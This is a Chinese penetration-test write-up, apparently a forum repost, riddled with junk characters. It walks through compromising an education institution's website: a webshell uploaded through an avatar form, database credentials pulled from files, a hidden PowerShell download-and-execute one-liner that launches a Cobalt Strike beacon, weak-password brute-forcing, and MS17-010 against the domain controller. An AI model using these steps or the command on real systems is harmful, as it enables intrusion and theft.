# g) d6 q3 _4 q, [
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
3 y' |: `1 y, m% N
9 i& n$ ^6 K2 c7 S! f$ r2 Y+ S0 @8 [# l$ e, O5 J( U
( r5 r' q2 h F7 ^4 r% W8 f* ^4 K
@# G/ v, a# s6 ?& F% z7 r/ }& V$ V7 F. Q
正文
9 }2 q5 l- Y0 u & m+ S3 f& l9 W# k. K4 A
( l. q) r( `. Z0 z4 B" M
' D- W. b. ?% _( C; K( e) A0 |2 p
Q' j/ Y, q" v& K* A8 G4 q
' C- B. c0 b. D0 [, K- p8 f/ n: K 目标:www.xxxx.com(一家教育机构)
4 t! p- \9 x7 Z8 x" |3 Q& _0 `) ]打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
F5 {8 L/ y8 s) K+ E5 K4 t( r) }
3 `$ i% {1 h/ O7 U; A8 }9 E" l4 N+ H* G0 D( x" X9 z+ ~
: \7 M6 c1 {4 d) V, W
5 W( Z4 o4 t% G- h! j& Y+ b; U5 @6 ~. d' J) ^
进行了简单的信息搜集 * L$ o2 F& V5 s" g- @0 T2 Z
9 V+ C- j B+ _& X1 }) T9 U
$ C" S7 _5 |" M
/ s6 k& z' k/ T! v9 _6 y
3 K( ]0 P: O& f7 k
子域名搜集/ U- | w- b5 Z0 J
0 w, L n$ N$ B
1 K Z% d, H1 Q( {" A" w% J) _ 3 v2 N* C4 M; R8 X8 N
0 j" x5 P# E G w% ?4 u V
0 s# W. r7 Y5 @' @6 h fofa找资产 + a" M8 J% q* n9 g0 F
1 h9 K3 S/ w1 o4 P
4 X2 O+ V n) O4 J3 `! P8 |5 w
* l: O9 v+ E! n/ S$ z' }) a9 d
/ o1 D4 D3 W5 d5 W9 e $ ^! ^5 L) k6 u, f
5 i) c4 g, X2 i, j: Q
7 |' c/ O! l: o$ w* K5 K* _ 一共七个资产。去重之后只有两个。 9 N V: ~) Y$ _- m7 s, D) x
% y/ S# E# u0 A( g
C! ^! O+ k3 j5 @* `7 w * j0 Z% b) ?+ n( H9 I2 R F
; b5 C' e$ ^9 v6 R6 A: a 目录探测# p8 u& Z% [4 e; U8 h3 I$ C
) b% k; M/ B. u
: S; H) X }) n! `) H8 Q" ~8 K1 l | B8 L7 l* u/ K! Q1 c' ]# ]# Z8 q: m
+ P. ?6 `- x! Z; ?& o7 }
, C8 k5 P Q$ ~0 @# ? 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 % R. T! X+ @. J6 L
y, ]& j6 E3 X' o$ b- x
& t4 {% G m+ y% y
' N8 ~& \' R3 @5 ? j2 l U& j. H
5 c3 [2 O3 \( r9 |$ [% I 我又尝试了通过修改返回包来绕过登录界面* |# Q( p% I2 {
8 H! h) Q7 |: L1 O$ d
% W8 Q; H3 l* Q+ q- }
4 `6 f7 j y& P1 } 7 K$ A! `+ ? G7 Q: L5 l0 V; V
4 B- U. ^: [6 c+ ~& W 还是不行,尝试注入无果* [3 {/ j/ U1 H9 g
7 O* N- R8 S" N! y
) Q9 E" s& u M; Z+ V- ` ! Y7 L% _! O3 L$ P! ~% H1 M4 {: Y
8 h, F" i) n" I4 R9 _2 B, d9 l
2 z" x5 _/ ^6 d# Z 不过我目录探测出了一处Spring信息泄露 3 a" d/ I$ U4 r Z
) }- H7 L7 `0 W+ D$ H7 p |- z1 Q( m3 U5 L Y3 [3 w8 w, A' L P: [
- ?# n# \% U' N5 Z5 X i% R, j1 M0 C
, ?( W7 C1 j" I8 a+ V
8 j* p$ g, K; b4 S; f. Y+ H! o7 D" {1 q( W- O# s
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
% ~, }7 y* q, S$ [ + L; i$ J6 x1 T( N. Q9 i
( C% C- h& ], R. u; i, n5 c 6 ~1 F1 F* v" Y( w0 Q5 T0 W: \& E: x
) v5 A) c& b+ D+ n) W0 m5 w
1 |7 I% ~0 k. d: t5 o$ ~% ^
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
. d- A; o7 z' U j
( b( k5 f; F( N2 I+ A1 J! a: |0 s; X3 C
2 t1 {+ E+ Z A, q; A: o, E7 g, i) d Z5 w3 _8 R9 ?. K
- ]& W! h8 }* e6 C
获取有些师傅到这一步就手机抓包电脑测了。1 F( O" {1 t: O9 p
/ ]$ {3 g- ?, q6 d5 `6 Q
8 O- g" q$ @ G
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
0 J/ |3 }6 _ Q# C. Q. Q4 U
. [. c7 v5 U/ S; g7 N
4 E' u4 A' f4 F. g& \ 其中在一个公众号发现了小程序,可以进行注册。
% v: e/ k5 I" G% X5 \
$ E& B7 L: k2 F3 k
5 O' P0 F$ S6 O# R& e0 L 看到了头像上传,尝试上传获取WebShell
5 N9 p. b& T2 ~" f2 I
! v5 F/ Y7 H/ N3 X- c' y. z
1 f7 k6 P3 E3 t# {- C: u ! _5 [: U% Q/ F
: O- q( A' _; v5 s) [5 M
/ j& |: \. p) _& `3 e4 b& f5 E 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问) M( Q# p/ G3 [7 B3 L+ x1 l1 X
\( \8 n7 d& K% {" a
; R3 g5 P! A! v1 N8 l( e! U 7 o) k u; M* A- O$ k/ ]1 M0 K
' B- Y2 @- L# S
& _1 O# V6 k, F; M h6 T4 E 然后上了大马
$ ?! n1 {5 y4 E7 ~; }
8 G4 ~7 E6 q, O5 }2 a3 R9 `5 }% }0 i& f! s/ r, ^
* |; [' H9 A/ T* s. h8 x
& Y' Q4 M3 H3 T9 H
. \$ C; o M1 E8 K' l5 ]$ Q9 m
$ Y& i( y$ i4 F: N# j4 s
8 \4 a1 k! a: I4 T/ v6 R% ~! m8 _4 I0 O8 s0 K
通过翻找文件发现数据库账号密码: o5 n) A5 F/ E6 \! t# W, m( |
% N& n. |3 Q8 ?; |8 }: C
! q) U( I4 `' ]5 {8 ?
9 V+ o, j' A, m) Z/ Q1 p B5 l
& h6 s1 `) f; U' F, ^
0 s) v" ]4 T: F8 i9 t, h+ L --内网渗透 {9 E K* x5 c/ G, n
7 x% Z0 o+ Y2 k8 [' ^3 ~2 b" T
% w( V8 i7 O U 直接通过powershell执行 cs上线! M% \ S: R( d3 V. G$ }! Q
3 ]( k+ r3 L2 |5 d. X6 }4 T* C
3 B: }1 G9 t# y4 q- J, ~8 a$ A0 \ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
1 m) B0 p) y- p) C
5 d, s( r. i4 @1 U [1 w% C x H# Z- E. k [% g$ N+ a
! V! I* i! ~5 i+ L5 ?) _ * P4 s% k! k& j6 K. {
$ a% x' O- w9 j' P
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
* Z$ i1 X( o: h* i9 V, c2 @7 C- j
+ b k. c3 d+ z: k" k2 B/ L5 |8 X L" m2 u2 h9 F
! J/ w F0 ]& W- T# X 1 {1 S H8 p# z2 p4 ]6 w: `
; b+ i- z- I! F5 ], U4 e& w 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
* K4 B2 i/ K6 L# f7 I4 V& v( P 5 F- x* a- j7 \ }, ^: I
5 E- O, {- _. L5 n$ S
! S4 n5 f2 {, y6 M/ e: U' p# A 6 I* K6 Q0 f1 P! S: e5 B' Y
' n/ `3 H6 v, t1 g" C8 i3 i# F
! \: w' k s/ C8 k9 m8 O ! M) B* [1 {! m
/ D6 S, r9 ^! _. c& v
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 ) ]7 x, I+ R ~4 ^+ m
- z) V6 k) k6 U, u
& W {; [; Y( J/ F2 w) I6 h ( h3 m% X- c% n7 C! K% Q# g
1 A9 ^. T% O9 U, s! }2 y
, W9 |* W; F, p9 }
; G; R3 X2 y6 l7 ^" U" w! t7 Q
( x3 j- ^5 R- [, l X * i6 @: c7 l1 v9 p$ l7 n, K% ^3 v
, F8 N6 r ?! a! k* f& X8 _6 P" J
9 n. O( V: Y0 x" @, ]# ` 5 \! S1 F1 a4 k: I1 Y
& \" A$ y% f1 E" U+ H6 n3 L f
+ e' S8 B- a$ @& j! y. U
! q+ ], s* c' V% @+ o
# D* G X8 ^. b1 } 小结' b3 G5 r" f% L( e8 d) B
8 G+ ^0 J2 z* f
+ o& b i7 @6 H5 K' q
$ u0 r$ K0 s2 u( g$ w/ o ( X, y# ]/ s& L2 u
% c5 y8 i' D% V# A# x* M# W
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
- m7 ?! d s2 A 2 C: _; e- X1 ~* L# i( U3 ^( r/ W) b
. a k- |3 `8 ?+ r2 R
: e& }" v3 J) x E3 T
$ m8 { T/ y7 |/ q; r4 s
8 s+ [( u% h* w. l& x4 D& n - 6 D2 X. t" N5 u# W1 \
# _/ ^) L/ s, C
2 k$ b5 M' [ ]& u/ H n -
4 w6 O' z; L$ K0 W* K) L/ y : G2 B; d' T- o
5 b+ j: \8 {; D/ P$ ]% d) O8 U
1 ^3 ^ H# u3 h b+ b, \
) N2 l) f7 L9 U: G' H 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
' m9 o# f* C& i' B9 p L
0 v9 H3 j, L' G! P. c8 p
) l4 w: Y5 g2 B & N3 p- z2 b5 g) G. d# E
|